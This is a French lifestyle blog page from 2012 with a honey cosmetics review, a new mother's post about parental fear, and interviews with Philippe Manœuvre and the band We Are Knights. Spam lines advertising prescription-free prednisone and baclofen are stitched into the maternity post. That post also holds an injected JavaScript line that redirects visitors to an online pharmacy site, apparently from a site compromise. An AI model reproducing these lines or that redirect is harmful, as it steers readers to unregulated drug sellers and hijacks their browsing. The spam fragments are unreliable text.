Secrets de Miel ou l’art de se faire plaisir avec l’Apithérapie

31 mars 2012 par  
Classé dans A la Une, Beauté

Non, l’Apithérapie ne consiste pas à taguer des smileys sur les murs ni à rire à gorge déployée 20 minutes par jour minimum – bien que ces deux choses soient tout à fait conseillées – mais cette science consiste à utiliser les propriétés des produits des abeilles pour se soigner : miel, gelée royale, pain d’abeilles …

J’ai récemment eu le plaisir de mettre à profit ma passion des baumes à lèvres en testant le baume à lèvres gourmand de la marque Secrets de Miel, une marque cosmétos haut de gamme à base de miel.

La marque existe depuis 2010 et a été créée par Elise Hernaez, une passionnée depuis toujours par les trésors de la ruche qui a parcouru le monde à la recherche de nouveaux produits pour nous les beautymielista. Depuis le domaine apicole familial spécialisé dans la production de produits de la ruche (miels, gelée royale, pollen), Elise nous concocte de nouvelles recettes beauté !

Utilisé plein pot lors de mon séjour au soleil à Playa Punta Cana (parfait en plein hiver), ce baume m’a littéralement sauvé de la sécheresse. Il faut dire que j’ai légèrement abusé du soleil (mais c’est pas tous les jours qu’on fait du catamaran sur la mer des Caraïbes aussi) et des cockails à base de vitamine R (comprendre vitamine rhumesque) ayant pour fâcheux effet de dessécher la peau.

Bref, une formule naturelle, une texture toute douce, qui ne COLLE PAS (suffisamment rare pour être remarqué) qui hydrate à fond … et qui sent tellement bon qu’on a envie d’en remettre tout le temps.

Je teste également depuis une semaine l’huile sèche éclatante, qui n’est pas sans rappeler l’huile prodigieuse de Nuxe. Je pars de loin pour réparer ma peau abîmée par le soleil mais cette huile donne un vrai coup d’éclat et pourrait bien trouver sa place dans le coin « gros oeuvre » de l’étagère de ma salle de bains. Une affaire à suivre !

Baume à lèvres Gourmand, Secrets de Miel. 11,50€

Huile sèche éclatante, 26€

Rendez-vous sur Hellocoton !

Sortie de ma bulle

26 mars 2012 par  
Classé dans A la Une, Lifestyle, Maternité


prednisone no rx. pain relief|muscle relaxant. buy deltasone online india , deltasone for cheap, what stores sell deltasone 10, buy prednisone pills online

Bientôt 5 mois que je fais partie du gang des mamans, les choses se font en fait petit à petit et je me surprend parfois à me dire que tout ça, c’est vrai, et que depuis le 5 novembre je suis devenue une maman, que je le resterai jusqu’à mon dernier souffle. Ca m’étourdit toujours un peu cette responsabilité, ce grand chamboulement.

Depuis 5 mois je vivais dans une sorte de bulle, cumulant mon travail à plein temps et ma petite poupée qui grandissait et s’éveillait de plus en plus. Pas le temps de regarder à côté ce qui se passait, j’étais vraiment occupée physiquement et mentalement à 100%, dédiée à ma fille et à mon travail.
Depuis quelques semaines ma petite fille passe 4 jours par semaine avec une nounou, tout se passe très bien, et de mon côté j’ai pu reprendre le chemin de mon bureau, 10 heures par jours à me consacrer à mon travail, à refaire des déjeuners sans mon ordi ou un biberon à portée de main, avant d’aller la récupérer, de m’occuper d’elle, la coucher et me remettre au travail quelques heures avant le repos de la guerrière.

order baclofen online. lioresal intrathecal. purchase baclofen online. order lioresal online. cheap baclofen . baclofen mg. buy cheap lioresal. lioresal online.

Je ne sais pas si c’est l’actualité très chargée ou le fait d’avoir retrouvé un vrai rythme, mais j’ai l’impression que cette semaine ma « bulle » a éclaté : Toulouse, la Belgique, tout le monde  a du être touché.

Je l’ai été évidemment, mais je pense que quelques mois plus tôt je n’aurai pas ressenti la même chose, et je découvre cette fameuse « peur » dont les parents parlent souvent, cette boule au ventre qui ne nous quitte jamais, celle qu’il arrive quelque chose à nos enfants. Ca a en fait commencé à la minute où j’ai su que j’étais enceinte, peur de faire une fausse-couche, que l’accouchement ne se passe pas bien, d’avoir un bébé en mauvaise santé. J’ai été « bénie », tout s’est très bien passé et j’ai un bébé en parfaite santé,  un papa très présent,  une petite fille vraiment facile à vivre je pense.
Je pense qu’il m’aura fallu 5 mois pour me sentir un peu plus proche des autres parents, il faut dire que j’ai encore très peu d’amis à Paris qui ont des enfants (d’ailleurs, ma peur du moment : que ma fille n’ai pas d’amis de son âge jusqu’à son entrée à l’école, elle ne traine qu’avec des trentenaires …) et du coup j’ai l’impression d’être un peu décalée : je ne suis plus comme avant, mais pas encore vraiment comme les parents, je suis en apprentissage, le cul entre 2 chaises …
Mais cette semaine je crois avoir été plus proche des autres parents, parce que je crois justement avoir touché du doigt cette fameuse peur, et ce constat : quoi qu’on puisse faire, avec toute la meilleure volonté du monde, il y a forcément des choses qui vont nous échapper et contre lesquelles on ne pourra pas lutter.

cheapest prices pharmacy. generic prednisone cost . official drugstore, prednisone 5 mg price .

Rien de neuf sous le soleil, certes, mais pendant 9 mois il m’a suffit de prendre soin de moi pour protéger ma fille, les premières semaines il m’a suffit de  faire en sorte qu’elle prenne bien son biberon, qu’elle n’attrape pas froid, elle dépendait vraiment de son père et de moi, parce que nous étions tous les 3 dans une bulle, et je ne la regrette pas cette période coupée du monde et centrée sur le nombril de notre bébé.

Maintenant ma fille passe 10 heures par jour avec une nounou que je ne connaissais pas il y a encore  6 semaines, et viendra un jour ou elle ira à l’école, partira en colo et si je ne veux surtout pas la couper du monde, je me dis que ça doit être vraiment dur de faire confiance aux autres, et à la vie en générale, mais ça doit être ça aussi, la vie de parent, celle de vivre avec sans cesse cette peur au fond de soi …

download and stream buy baclofen 200ytw songs and albums, watch videos, see pictures, find tour dates, and keep up with all the news on 
 

Source photo : http://www.behance.net/gallery/Shadow/624528

 

 

 
window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !

Enfants du Rock, Philippe Manœuvre débarque sur Caractérielles !

21 mars 2012 par  
Classé dans A la Une, Culture, Lifestyle, Musique

 

Rencontré à l’occasion d’un Showcase privé organisé par Pression Live, LE Big Boss des journalistes rock aux lunettes presque plus légendaires que celles de Stevie Wonder a accepté de répondre à quelques questions !

Quel est LE single qui a changé votre vie ? Celui qui vous a fait dire « le rock fera partie de ma vie ! » ?

Sans doute un disque de Jerry Lee Lewis entendu en 1968, un 45 tours où il reprenait « Jenny Jenny ». En trois minutes, mon destin était tracé devant moi : rock’n’roll ! Je vais repasser ce 45 tours sur Oui FM un de ces jours, il faut que vous entendiez ça …

(Ah oui, on comprend pourquoi ! Ouok ène ouoll !)


 

Je suis née en 1982, l’année où vous rejoigniez l’émission « Les Enfants du Rock ». Ma mère n’arrête pas de me dire que c’était une vraie révolution à l’époque, qu’on avait enfin droit à une émission culturelle digne de ce nom. En 2012, quel regard portez-vous sur cette époque ? Regrettez-vous le manque de programmes à l’esprit « rock » ?

Bien sûr qu’on aurait tous mérité une bonne émission rock hebdomadaire à base de concerts, news, archives, rockumentaires, à chaque fois qu’on évoque le rock à la tv, on met le doigt sur le problème de la modernité en France.

Restons en 2012, quels sont les groupes qui vous excitent le plus en ce moment ? Trouvez-vous que le rock soit en perte de vitesse ?

J’adore ce que font Jack White, les Arctic Monkeys, Black Keys, Queens Of The Stone Age. Il y a plein de petits labels, la musique se repositionne, les gens qui font des disques le font par amour de la musique, on vit une époque formidable. Et Pete Doherty est de ce monde, donc tout va bien.

Le livre « les 101 disques qui ont changé le monde » trône sur ma bibliothèque depuis 2005. Si j’osais vous demander d’être encore plus sélectif, quels seraient les 3 disques dont vous ne pourriez pas vous séparer ?

Toujours cette culture de l’instant, du raccourci, du lyophilisé … J’ai écrit la suite de la Discothèque idéale, aujourd’hui elle contient 207 albums et j’envisage le tome 3 pour dans quelques années … L’idée serait de raconter le rock’n’roll en 333 albums.

Quels sont vos endroits fétiches pour écouter du rock à Paris ?

J’aime bien le Gibus, on y a fait trois ans la fête avec les BB rockers, j’aime l’Olympia, Bercy, le Stade de France même du moment qu’il y a du rock sur scène, je ne suis pas pointilleux sur l’endroit. On prend notre pied partout !

Enfin, pourriez-vous m’aider à me décider pour le/la prochain(e) rocker(euse) qui apparaitra sur mon TumblR dédié aux Rockers sexy ? 

Hé bien : Iggy Pop y est ??? Sinon moi …

(Iggy attendra, Philou est à l’honneur sur le Tumblr ! )

Et sinon, en passant, Pression Live propose de gagner plus de 4000 places de concerts partout en France et ce tout au long de l’année. Comment faire, j’ai envie de dire easy easy :

En téléchargeant l’appli Pression Live sur son smartphone : disponible sur Android Market et Apple Storel’application mobile Pression Live permet à l’utilisateur de gagner ses places de concert via un instant gagnant. Pour multiplier ses chances de gagner, il suffit de parrainer ses amis et/ou d’un petit « check-in »  dans les 200 bars référencés sur l’appli et le site PressionLive.com

En jouant directement sur la fan page Pression Live www.facebook.com/pression.live

Directement sur ton pack de bière : des QR code présents sur les packs produits porteurs de l’opération redirigent vers l’application Pression Live.

Pression Live (un concept développé par Kronenbourg) est présent sur les plus gros festivals de musique français : les vieilles Charrues, Garorock, Rock en Seine, Le printemps de Bourges … avec des scènes musicales et des animations.

La démo de l’appli mobile :

Rendez-vous sur Hellocoton !

We Are Knights, preux chevaliers de l’électro froggy, débarquent sur Caractérielles (et au Nouveau Casino) !

9 mars 2012 par  
Classé dans A la Une, Culture, Lifestyle, Musique

Ⓒ Simon Betite www.simonbetite.com/

J’expliquais il y a quelques temps combien j’étais fan de l’application We Are Hunted sur Spotify , qui m’a à nouveau TRES agréablement surprise en me présentant le numéro 1 des « emerging charts » le trio parisien « We Are Knights », présent sur la dernière compilation Kitsuné Parisien II. We Are Knights ? Mais si, on en a parlé ici et ça envoie, il n’y a qu’à voir (et à mettre le son à fond) :


Le trio sera en concert au Nouveau Casino le 14 mars prochain et pour vous faire patienter jusque là, nous vous avons concocté une interview apéritive !

Rencontre avec Jean-Marc et Guilhem :

D’où vient le nom « We are Knights », êtes-vous fan des Monty Python ?

Nous ne l’avions pas envisagé sous cet angle ^^, même si j’adore les Monty Python (surtout « la vie de Brian »). 

Nous étions attirés par le code fédérateur des chevaliers réunis pour défendre une cause, mais aussi par le côté ludique rappelant les jeux de notre enfance, l’onirisme… Nous attachons beaucoup d’importance à la symboliques, et ce que ce nom véhicule retranscrit plutôt honnêtement notre vision du projet.

Quelle est l’histoire du groupe ? Est-ce que vous vous connaissiez avant ?

Guilhem et moi nous sommes rencontré lors de nos cheminements professionnels à plusieurs reprises et en diverses occasions lors de ces trois dernières années. Nous nous sommes rapproché le plus simplement du monde, de part nos affinités humaines, au delà de toutes considérations musicales. Il s’est avéré que sur ce dernier plan nous partagions beaucoup, c’est alors que nous avons commencé à écrire assez naturellement ensemble. Le premier titre qui nous est venu fût «Turn Around You » en Juin 2011.

C’était vraiment stimulant, on a instantanément partager une vision sur les morceaux. Nous avons été en phase de façon spontanée dans notre travail de composition et d’arrangement. Je crois qu’on peut parler d’osmose. Nous avons rapidement composé un répertoire et nous avons alors trouvé un nom qui embrasserait ce projet dans son entièreté. Ce qui partait d’une simple rencontre musicale s’est mué en une nécessité de composer et de jouer sur scène. Quelques mois plus tard nous avons proposé à Gaëlle de nous rejoindre. Elle a tout de suite adhéré au projet, et nous étions lancés.

Quelles sont vos influences musicales ?

Il y a beaucoup de groupes et chanteurs qui m’ont marqué plus jeune, et qui participent toujours à mon quotidien, je pense notamment à Dylan ou Sonic Youth. Belle & Sebastian a été aussi fondamental dans mon approche d’une poésie musicale, tandis que Joy Division m’a appris l’aspect cathartique que peut revêtir la musique. J’ai aussi été frappé par la technique de Thee Silver Mount Zion et l’expérience musicale si pure générée par leurs sonorités. Je pense aussi à Pavement pour l’urgence qui se dégage de leurs morceaux qui ont une forme de simplicité assumée et revendiquée. Le songwriting a toujours eu une place prépondérante dans les disques que j’écoute, à ce titre, Grandaddy, et Sparklehorse m’ont touché de par la mélancolie palpable de leurs paroles… Il est difficile de dégager d’emblée des références spécifiques… Le cinéma et la littérature font, par exemple, également partie intégrante d’un processus de restitution musicale.  Au fil du temps, on ne sait vraiment quels éléments ont été digérées…

L’introduction du titre « Tears » m’a tout de suite fait penser à celle de « Rebellion (lies) » d’Arcade Fire, est-ce que c’est quelque chose de voulu ?

La comparaison est très flatteuse, mais à vrai dire il n’y a rien de calculé à cela. On est effectivement partis d’une ligne de basse, mais il s’agit vraiment d’un concours de circonstance.

Vous avez assuré l’after show de Vivienne Westwood au Café Carmen pendant la Fashion week, votre musique accompagne des clips de Vogue … La mode semble être très présente dans votre univers artistique, y’a-t-il une raison particulière ?

C’est un peu le fruit du hasard, nous avons rencontré Chris Roman qui est réalisateur, photographe et vidéaste. Il était emballé à l’idée d’utiliser quelques un de nos titres pour illustrer son journal quotidien de la fashion week. Ses vidéos sont vraiment très belles et ses images élégantes et poétiques. C’est une chance inouïe qui nous a été offerte de
travailler avec lui. D’ailleurs, il va très prochainement se lancer dans la réalisation du clip d’un de nos morceaux.

Gaëlle travaille depuis quelques années dans le milieu de la mode. Elle a, par ailleurs, vécu quelques temps en Angleterre, où elle a rencontré Vivienne Westwood. Elles sont toutes deux très proches depuis. Le concert était organisé à l’occasion de la clôture de la
journée de défilé.

 

Ⓒ Rodrigue Huart www.rodriguehuart.com/

Quels sont vos crush musicaux du moment ?

Moss – Ornaments

Black Keys – El Camino

The Black Angels – Entrance Song

M83 – Midnight

M O N E Y : http://vimeo.com/35829532

Nous allons devoir faire un peu de parisianisme (désolée, mais 100% de l’équipe Caractérielles vit à Paris !), quels sont vos spots préférés à Paris pour écouter de la bonne musique ?

Le Point Éphémère
Le Trianon
La Flèche d’or
Le Nouveau casino
Le Pop in

Pour suivre les WAK, c’est par ici !

http://weareknights.tumblr.com/

https://www.facebook.com/weareknightsmusic

 

 

Rendez-vous sur Hellocoton !

Musique : Pump Up The Volume #2 – VHS or Beta, We Are Knights, Miami Horror & Fred Falke

3 mars 2012 par  
Classé dans A la Une, Culture, Lifestyle, Musique

Crédit photo : http://pinterest.com/torif/

VHS or Beta – Burn It All Down, qu’on entend dans le documentaire « The September Issue« , rock house à la limite du disco from Brooklyn, 4 bonnes raisons d’écouter !

We Are Knights – Tears, preux chevaliers de l’éléctro-pop froggy

Miami Horror – Make You Mine (Fred Falke extended Mix), oui extended, car ça dure 7 minutes mais je parie que vous en redemanderez à la fin.

 

 

Rendez-vous sur Hellocoton !